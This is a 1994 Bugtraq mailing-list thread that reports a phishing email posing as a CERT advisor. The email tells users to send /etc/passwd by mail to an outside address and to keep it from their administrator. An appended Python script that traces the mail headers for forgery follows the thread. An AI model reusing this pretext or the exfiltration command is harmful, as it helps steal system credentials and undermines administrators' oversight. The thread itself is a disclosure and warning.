Bugtraq mailing list archives

Re: Another request for passwords


From: chowes () helix net (Charles Howes)
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)


On Sun, 23 Oct 1994, Douglas R. Floyd wrote:

I got this in the mail today (10-23).

Seems like someone is knocking on io.com now.

(The forward to paris is normal as mail gets forwarded there.)

BEGIN FUNKY MESSAGE --------

From vanepp () sfu ca  Sun Oct 23 00:00:56 1994
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
(931110.SGI/930416.SGI.AUTO)
        for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
        by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
        id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
(8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important
Status: RO

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca


END FUNKY MESSAGE -----

I sent cert () cert org a copy, as well as the admins at io.com.

I know this was posted earlier, but I think this is another address,
possibly an MX record as I could not telnet or finger sfu.ca.


Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people.  Vanepp in particular.

Argh.  This is the third mailbomb.  I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month.  The bugger keeps signing on via modem, and this is a
problem.  We can't afford callerid.

--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971   
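
Added example, not part of either poster's message: a header trace over the forwarded message, comparing the domain in From: with the host recorded in the earliest Received: line. The function names (`addr_domain`, `hops`, `trace`) are hypothetical and the mismatch check is a heuristic, not proof of forgery; the header text is copied from the message above, with continuation lines re-indented.

```python
import re
from email import message_from_string
# Headers from the forwarded message; continuation lines re-indented so they
# fold correctly. The archive prints "user@host.tld" as "user () host tld".
RAW = """\
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
 (931110.SGI/930416.SGI.AUTO)
 for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
 by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
 id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
 (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
 dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
"""
HOP = re.compile(r"from\s*([^\s(]*)\s*(?:\(([^)]*)\))?\s*by\s+(\S+)")

def addr_domain(value):
    """Domain of 'u@d.tld' or of the archive's 'u () d tld' form."""
    value = value.strip().strip("<>")
    if "@" in value:
        return value.rsplit("@", 1)[1].lower()
    return ".".join(value.split("()", 1)[1].split()).lower()

def hops(msg):
    """Received hops, newest first, as (helo, peer, ip, by)."""
    out = []
    for value in msg.get_all("Received", []):
        m = HOP.match(" ".join(value.split()))
        if m:
            helo, paren, by = m.groups()
            peer = re.match(r"([^\s\[]*)\s*(?:\[([^\]]+)\])?", paren or "")
            out.append((helo, peer.group(1), peer.group(2), by.lower()))
    return out

def trace(raw):
    """Compare the From domain with the host that handed over the message."""
    msg = message_from_string(raw)
    chain = hops(msg)
    helo, peer, ip, by = chain[-1]          # bottom Received = first hop
    claimed, origin = addr_domain(msg["From"]), (peer or helo).lower()
    findings = []
    if not helo:
        findings.append("first hop gave no HELO name")
    if origin != claimed and not origin.endswith("." + claimed):
        findings.append(f"From says {claimed}, first hop came from {origin} [{ip}]")
    return {"claimed": claimed, "origin": origin, "ip": ip,
            "path": [h[3] for h in reversed(chain)], "findings": findings}
```

Calling `trace(RAW)` reports the relay path in delivery order along with both findings for this message.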


